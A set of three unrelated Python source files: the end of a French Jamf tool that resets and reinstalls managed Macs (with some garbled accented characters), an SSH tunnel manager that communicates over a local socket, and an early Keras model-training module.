log.error("Adobe CC2019 n'existe pas sur cette machine")
root.update()
# Remove ESET antivirus app with jamf policy
if jamf_cmd('policy -event uninstall_eset') is True:
log.info("Application antivirus ESET supprimรฉe avec succรจs")
step['check_del_eset'].configure(text="Suppression de l'antivirus ESET : OK", fg="green")
else:
step['check_del_eset'].configure(text="Suppression de l'antivirus ESET : Erreur", fg="red")
log.error("Une erreur a empรชchรฉ la suppression de l'application antivirus ESET !")
root.update()
# Upload the computer history to our SFTP server
if upload_history(self.json_headers, self.auth, self.my_id, self.my_serial, self.my_name) is True:
step['check_upload_history'].configure(text="Sauvegarde des infos Jamf vers SFTP : OK", fg="green")
else:
step['check_upload_history'].configure(text="Sauvegarde des infos Jamf vers SFTP : Erreur", fg="red")
log.error("Une erreur a empรชchรฉ la sauvegarde des infos Jamf vers FTP !")
root.update()
# Delete this computer from the Jamf DB to prevent conflicts
if delete_computer(self.my_id, self.auth) is True:
log.info("Mac supprimรฉ de la base donnรฉes Jamf avec succรจs")
step['check_del_computer'].configure(text="Suppression de la base Jamf : OK", fg="green")
root.update()
else:
step['check_del_computer'].configure(text="Suppression de la base Jamf : Erreur", fg="red")
self.error("Erreur", "Une erreur a empรชchรฉ la suppression du Mac de la DB Jamf ! Merci de contacter le support IP-Echanges")
self.resync()
return
# Launch the reinstall command
try:
reset_command = threading.Thread(target=launch_reset, args=(package_name,))
reset_command.start()
step['check_launch_reset'].configure(text="Lancement de la rรฉinstallation : OK", fg="green")
step['check_reboot'].configure(text="Redรฉmarrage en cours, veuillez patientier...", fg="blue")
root.update()
log.info("La procรฉdure de rรฉinstallation est lancรฉe, cliquez sur OK pour autoriser le redรฉmarrage.")
show_jamfhelper()
except Exception as e:
log.error("Erreur pendant la rรฉinstallation : {}".format(e))
step['check_launch_reset'].configure(text="Lancement de la rรฉinstallation : Erreur", fg="red")
root.update()
text = "Attention !\nLa commande de rรฉinitialisation ne s'est pas effectuรฉe correctement ! Merci de contacter le support IP-Echanges"
self.error("Erreur pendant la rรฉinitialisation", text)
self.resync()
return
except Exception as e:
log.error("Erreur dans la fonction reset_computer : {}".format(e), exc_info=True)
self.resync()
return
###########################################################################
### Start the main application
###########################################################################
if __name__ == '__main__':
log.info('--- Lancement de {}, {} ---'.format(title, version))
# Import downloaded libraries
try:
import requests
except Exception as e:
log.error("*** Erreur *** Impossible d'importer la librairie Python requests.\nContacter le support IP-Echanges.\n\nRaison : {}".format(e))
sys.exit(1)
try:
import AppKit
except Exception as e:
log.error("*** Erreur *** Impossible d'importer la librairie Python AppKit.\nContacter le support IP-Echanges.\n\nRaison : {}".format(e))
sys.exit(1)
try:
import pysftp
except Exception as e:
log.error("*** Attention *** Impossible d'importer la librairie Python pysftp.\nCeci empรชchera le script de crรฉer une sauvegarde vers un serveur SFTP distant.\n\nRaison : {}".format(e))
sys.exit(1)
# Import caffeine and prevent mac from sleeping
try:
import caffeine
caffeine.on(display=True)
log.info("Module Caffeine activรฉ, mise en veille interdite")
except:
log.warning("Impossible d'activer le module caffeine, le Mac risque de passer en mode veille en cours d'installation")
# Defining main API variables
try:
# Defining variables from Jamf
jamf = {
'url_jamf':sys.argv[4],
'policy_match_name':sys.argv[5],
'sftp_address':sys.argv[6],
'sftp_credentials':sys.argv[7],
'macos_last_version':sys.argv[8],
'autologon':sys.argv[9],
'api_user':sys.argv[10],
'api_pswd':sys.argv[11],
}
log.info('Using jamf arguments as main variables')
except:
# Jamf testing parameters
jamf = {
'url_jamf':"YOUR_JAMF_URL",
'policy_match_name':"YOUR_CUSTOM_TRIGGER",
'sftp_address':'YOUR_SFTP_ADDRESS:PORT',
'sftp_credentials':'USERNAME:PASSWORD',
'macos_last_version':'10.14.6',
'autologon':'non',
'api_user':'USERNAME',
'api_pswd':'PASSWORD',
}
log.info('Using test parameters as main variables')
# Common variables
sftp_root = '/'
# Kill Self Service app
os.system('killall "Self Service"')
# Launch Tkinter app
root = tk.Tk()
app = JamfOneClickReinstall(root)
AppKit.NSApplication.sharedApplication().activateIgnoringOtherApps_(True)
root.mainloop()
|
server.py | import os
import subprocess
import shutil
import queue
import socket
import struct
import pickle
import tempfile
import threading
import logging
from select import select
from os.path import dirname, basename
from conduit_client import ssh
PYTHON = shutil.which('python3')
MODULE_PATH = dirname(dirname(__file__))
MODULE_NAME = basename(dirname(__file__))
LOGGER = logging.getLogger()
LOGGER.addHandler(logging.NullHandler())
def _set_if_not_none(d, key, value):
value = value if value is not None else os.getenv(key)
if value is None:
return
d[key] = str(value)
class Command:
COMMAND_NOOP = 0
COMMAND_DEL = 1
COMMAND_ADD = 2
COMMAND_STOP = 3
COMMAND_LIST = 4
COMMANDS = {
COMMAND_NOOP: 'noop',
COMMAND_DEL: 'del',
COMMAND_ADD: 'add',
COMMAND_STOP: 'stop',
COMMAND_LIST: 'list',
}
def __init__(self, command):
self.command = command
def __str__(self):
return f'{self.__class__.__name__}: command={self.name}'
@property
def name(self):
return self.COMMANDS[self.command]
@staticmethod
def unpack(s, timeout=None):
if timeout:
r = select([s], [], [], timeout)[0]
if s not in r:
raise TimeoutError('Socket not readable')
data = s.recv(2)
if not data:
raise EOFError()
size = struct.unpack('H', data)[0]
return pickle.loads(s.recv(size))
def pack(self):
data = pickle.dumps(self)
return struct.pack('H', len(data)) + data
def send(self, s):
s.send(self.pack())
def apply(self, manager, server):
pass
class DomainCommand(Command):
def __init__(self, command, domain, arguments):
super().__init__(command)
self.domain = domain
self.arguments = arguments
class ListCommand(Command):
def apply(self, manager, socket):
for tunnel in manager.list_tunnels():
TunnelCommand(Command.COMMAND_ADD, tunnel).send(socket)
class TunnelCommand(Command):
def __init__(self, command, tunnel):
super().__init__(command)
self.tunnel = tunnel
def apply(self, manager, socket):
if self.command == Command.COMMAND_ADD:
manager.add_tunnel(self.tunnel)
elif self.command == Command.COMMAND_DEL:
manager.del_tunnel(self.tunnel)
class SSHManagerServer:
def __init__(self, sock_name):
self._sock_name = sock_name
self._queue = queue.Queue()
self._manager = ssh.create_manager()
self._socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._reader = threading.Thread(target=self._read, daemon=True)
self._reader.start()
def _read(self):
noop = Command(Command.COMMAND_NOOP)
try:
self._socket.connect(self._sock_name)
while True:
try:
cmd = Command.unpack(self._socket)
except EOFError:
LOGGER.error('EOF encountered, exiting')
return
except Exception:
LOGGER.exception('Error reading command.')
continue
LOGGER.debug('Received command: %s, acking', cmd)
if cmd.command == Command.COMMAND_LIST:
cmd.apply(self._manager, self._socket)
noop.send(self._socket)
continue
elif cmd.command == Command.COMMAND_STOP:
LOGGER.info('Exiting')
return
noop.send(self._socket)
self._queue.put(cmd)
finally:
self._socket.close()
def run_forever(self):
while True:
self._manager.poll()
try:
command = self._queue.get(timeout=10.0)
except queue.Empty:
continue
if not isinstance(command, TunnelCommand):
continue
try:
command.apply(self._manager, self._socket)
except Exception:
LOGGER.exception('Error handling command')
class SSHManagerClient:
def __init__(self, host=None, port=None, user=None, key=None,
host_keys=None):
self._env = {}
_set_if_not_none(self._env, 'SSH_HOST', host)
_set_if_not_none(self._env, 'SSH_PORT', port)
_set_if_not_none(self._env, 'SSH_USER', user)
_set_if_not_none(self._env, 'SSH_KEY_FILE', key)
_set_if_not_none(self._env, 'SSH_HOST_KEYS_FILE', host_keys)
self._sock_name = None
self._listen = None
self._socket = None
self._server = None
self._lock = threading.Lock()
def __del__(self):
self.close()
def close(self):
if self._socket:
self._socket.close()
self._socket = None
if self._listen:
self._listen.close()
self._listen = None
def _start_server(self):
if self._server is not None and self._server.poll() is None:
return
self._sock_name = tempfile.mktemp()
self._listen = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._listen.bind(self._sock_name)
self._listen.listen()
self._server = subprocess.Popen(
[PYTHON, '-m', MODULE_NAME, self._sock_name],
cwd=MODULE_PATH,
env=self._env
)
self._socket, _ = self._listen.accept()
def disconnect(self, timeout=None):
try:
self._send_command(Command(Command.COMMAND_STOP))
except EOFError:
pass
self.close()
os.remove(self._sock_name)
self._server.kill()
self._server = None
def _send_command(self, cmd):
reply = []
self._lock.acquire(timeout=1.0)
try:
self._start_server()
cmd.send(self._socket)
while True:
cmd = Command.unpack(self._socket, timeout=1.0)
if cmd.command == Command.COMMAND_NOOP:
break
reply.append(cmd)
return reply
finally:
self._lock.release()
def ping(self):
self._send_command(Command(Command.COMMAND_NOOP))
def add_tunnel(self, tunnel):
self._send_command(
TunnelCommand(
Command.COMMAND_ADD, tunnel)
)
def del_tunnel(self, tunnel):
self._send_command(
TunnelCommand(Command.COMMAND_DEL, tunnel)
)
def list_tunnels(self):
reply = self._send_command(
ListCommand(Command.COMMAND_LIST)
)
return [r.tunnel for r in reply]
|
training.py | from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import threading
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None, check_batch_dim=True,
exception_prefix=''):
'''Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
'''
if type(data) is dict:
arrays = []
for name in names:
if name not in data:
raise Exception('No data provided for "' +
name + '". Need data for each key in: ' +
str(data.keys()))
arrays.append(data[name])
elif type(data) is list:
if len(data) != len(names):
if len(data) > 0 and hasattr(data[0], 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise Exception('Error when checking ' + exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects a '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) != 1:
# case: model expects multiple inputs but only received
# a single Numpy array
raise Exception('The model expects ' + str(len(names)) +
' input arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# make arrays at least 2D
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# check shapes compatibility
if shapes:
for i in range(len(names)):
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_dim:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if type(x_weight) is list and len(x_weight) == 1:
return x_weight
if type(x_weight) is dict and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if type(x_weight) is list:
if len(x_weight) != len(output_names):
raise Exception('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if type(x_weight) is dict:
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise Exception('The model has multiple outputs, so `' +
weight_type + '` '
'should be either a list of a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def standardize_class_weights(class_weight, output_names):
return standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def standardize_sample_weights(sample_weight, output_names):
return standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def check_array_lengths(X, Y, W):
x_lengths = [x.shape[0] for x in X]
y_lengths = [y.shape[0] for y in Y]
w_lengths = [w.shape[0] for w in W]
set_x = set(x_lengths)
if len(set_x) != 1:
raise Exception('All input arrays (x) should have '
'the same number of samples.')
set_y = set(y_lengths)
if len(set_y) != 1:
raise Exception('All target arrays (y) should have '
'the same number of samples.')
set_w = set(w_lengths)
if len(set_w) != 1:
raise Exception('All sample_weight arrays should have '
'the same number of samples.')
if list(set_x)[0] != list(set_y)[0]:
raise Exception('Input arrays should have '
'the same number of samples as target arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_y)[0]) + ' target samples.')
if list(set_x)[0] != list(set_w)[0]:
raise Exception('Sample_weight arrays should have '
'the same number of samples as input arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
assert len(targets) == len(losses) == len(output_shapes)
key_losses = {'mean_square_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, losses, output_shapes):
if loss.__name__ == 'categorical_crossentropy':
if y.shape[1] == 1:
raise Exception('You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses and shape[1] is not None and y.shape[1] != shape[1]:
raise Exception('A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def collect_metrics(metrics, output_names):
if not metrics:
return [[] for _ in output_names]
if type(metrics) is list:
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif type(metrics) is dict:
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if type(output_metrics) is not list:
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise Exception('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def collect_trainable_weights(layer):
trainable = getattr(layer, 'trainable', True)
if not trainable:
return []
weights = []
if layer.__class__.__name__ in ['Sequential', 'Model']:
for sublayer in layer.layers:
weights += collect_trainable_weights(sublayer)
elif layer.__class__.__name__ == 'Graph':
for sublayer in layer._graph_nodes.values():
weights += collect_trainable_weights(sublayer)
else:
weights += layer.trainable_weights
return weights
def batch_shuffle(index_array, batch_size):
'''This shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
'''
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def make_batches(size, batch_size):
'''Returns a list of batch indices (tuples of indices).
'''
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, nb_batch)]
def slice_X(X, start=None, stop=None):
'''This takes an array-like, or a list of
array-likes, and outputs:
- X[start:stop] if X is an array-like
- [x[start:stop] for x in X] if X in a list
Can also work on list/array of indices: `slice_X(x, indices)`
# Arguments:
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
'''
if type(X) == list:
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in X]
else:
return [x[start:stop] for x in X]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return X[start]
else:
return X[start:stop]
def weighted_objective(fn):
'''Transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
'''
def weighted(y_true, y_pred, weights, mask=None):
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
'''Performs weight input validation and standardization
to a single sample-wise (or timestep-wise) weight array.
'''
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise Exception('"sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise Exception('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
assert len(sample_weight.shape) <= len(y.shape)
# TODO: proper error message
assert y.shape[:sample_weight.ndim] == sample_weight.shape
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise Exception('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],))
else:
return np.ones((y.shape[0], y.shape[1]))
def generator_queue(generator, max_q_size=10,
wait_time=0.05, nb_worker=1):
'''Builds a threading queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
'''
q = queue.Queue()
_stop = threading.Event()
def data_generator_task():
while not _stop.is_set():
try:
if q.qsize() < max_q_size:
try:
generator_output = next(generator)
except ValueError:
continue
q.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
_stop.set()
raise
generator_threads = [threading.Thread(target=data_generator_task)
for _ in range(nb_worker)]
for thread in generator_threads:
thread.daemon = True
thread.start()
return q, _stop
class Model(Container):
def compile(self, optimizer, loss, metrics=[], loss_weights=None,
sample_weight_mode=None, **kwargs):
'''Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [objectives](/objectives).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of objectives.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
kwargs: when using the Theano backend, these arguments
are passed into K.function. Ignored for Tensorflow backend.
'''
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# prepare loss weights
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif type(loss_weights) is dict:
for name in loss_weights:
if name not in self.output_names:
raise Exception('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif type(loss_weights) is list:
if len(loss_weights) != len(self.outputs):
raise Exception('When passing a list as loss_weights, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss))
loss_weights_list = loss_weights
else:
raise Exception('Could not interpret loss_weights argument: ' +
str(loss_weights))
# prepare loss functions
if type(loss) is dict:
for name in loss:
if name not in self.output_names:
raise Exception('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
raise Exception('Output "' + name +
'" missing from loss dictionary')
loss_functions.append(objectives.get(loss[name]))
elif type(loss) is list:
if len(loss) != len(self.outputs):
raise Exception('When passing a list as loss, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [objectives.get(l) for l in loss]
else:
loss_function = objectives.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [weighted_objective(fn) for fn in loss_functions]
# prepare output masks
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if type(masks) is not list:
masks = [masks]
# prepare sample weights
if type(sample_weight_mode) is dict:
for name in sample_weight_mode:
if name not in self.output_names:
raise Exception('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
sample_weights = []
sample_weight_modes = []
for name in self.output_names:
if name not in sample_weight_mode:
raise Exception('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif type(sample_weight_mode) is list:
if len(sample_weight_mode) != len(self.outputs):
raise Exception('When passing a list as sample_weight_mode, ' +
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed sample_weight_mode=' +
str(sample_weight_mode))
sample_weights = []
sample_weight_modes = []
for mode, name in zip(sample_weight_mode, self.output_names):
if mode == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
else:
if sample_weight_mode == 'temporal':
sample_weights = [K.placeholder(ndim=2, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = ['temporal' for name in self.output_names]
else:
sample_weights = [K.placeholder(ndim=1, name=name + '_sample_weights')
for name in self.output_names]
sample_weight_modes = [None for name in self.output_names]
self.sample_weight_modes = sample_weight_modes
# prepare targets of model
self.targets = []
for i in range(len(self.outputs)):
shape = self.internal_output_shapes[i]
name = self.output_names[i]
self.targets.append(K.placeholder(ndim=len(shape), name=name + '_target'))
# prepare metrics
self.metrics_names = ['loss']
self.metrics = []
# compute total loss
total_loss = None
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
weighted_loss = weighted_losses[i]
sample_weight = sample_weights[i]
mask = masks[i]
loss_weight = loss_weights_list[i]
output_loss = weighted_loss(y_true, y_pred,
sample_weight, mask)
if len(self.outputs) > 1:
self.metrics.append(output_loss)
self.metrics_names.append(self.output_names[i] + '_loss')
if total_loss is None:
total_loss = loss_weight * output_loss
else:
total_loss += loss_weight * output_loss
# add regularization penalties to the loss
for r in self.regularizers:
total_loss = r(total_loss)
# list of same size as output_names.
# contains tuples (metrics for output, names of metrics)
nested_metrics = collect_metrics(metrics, self.output_names)
for i in range(len(self.outputs)):
y_true = self.targets[i]
y_pred = self.outputs[i]
output_metrics = nested_metrics[i]
for metric in output_metrics:
if metric == 'accuracy' or metric == 'acc':
# custom handling of accuracy (because of class mode duality)
output_shape = self.internal_output_shapes[i]
if output_shape[-1] == 1:
# case: binary accuracy
self.metrics.append(metrics_module.binary_accuracy(y_true, y_pred))
elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
# case: categorical accuracy with sparse targets
self.metrics.append(
metrics_module.sparse_categorical_accuracy(y_true, y_pred))
else:
# case: categorical accuracy with dense targets
self.metrics.append(metrics_module.categorical_accuracy(y_true, y_pred))
if len(self.output_names) == 1:
self.metrics_names.append('acc')
else:
self.metrics_names.append(self.output_layers[i].name + '_acc')
else:
metric_fn = metrics_module.get(metric)
self.metrics.append(metric_fn(y_true, y_pred))
if len(self.output_names) == 1:
self.metrics_names.append(metric_fn.__name__)
else:
self.metrics_names.append(self.output_layers[i].name + '_' + metric_fn.__name__)
# prepare gradient updates and state updates
self.optimizer = optimizers.get(optimizer)
self.total_loss = total_loss
self.sample_weights = sample_weights
# functions for train, test and predict will
# be compiled lazily when required.
# This saves time when the user is not using all functions.
self._function_kwargs = kwargs
self.train_function = None
self.test_function = None
self.predict_function = None
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise Exception('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# get trainable weights
trainable_weights = []
for layer in self.layers:
trainable_weights += collect_trainable_weights(layer)
training_updates = self.optimizer.get_updates(trainable_weights, self.constraints, self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise Exception('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase:
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=[], batch_size=32,
nb_epoch=100, verbose=1, callbacks=[],
val_f=None, val_ins=None, shuffle=True,
callback_metrics=[]):
'''Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
# Returns
`History` object.
'''
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(len(ins[0]), len(val_ins[0])))
nb_train_sample = len(ins[0])
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
for epoch in range(nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise Exception('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
epoch_logs = {}
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
